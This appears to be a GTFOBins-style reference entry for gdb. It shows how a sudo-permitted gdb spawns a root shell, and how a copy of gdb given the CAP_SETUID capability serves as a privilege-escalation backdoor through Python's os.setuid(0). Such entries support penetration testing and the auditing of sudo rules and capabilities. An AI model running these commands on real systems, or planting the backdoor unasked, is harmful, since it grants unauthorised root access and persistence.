***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * sudo gdb -nx -ex '!sh' -ex quit
***** Capabilities *****
If the binary has the Linux CAP_SETUID capability set or it is executed by
another binary with the capability set, it can be used as a backdoor to
maintain privileged access by manipulating its own process UID.
    * This requires that GDB is compiled with Python support.
      cp $(which gdb) .
      sudo setcap cap_setuid+ep gdb

      ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
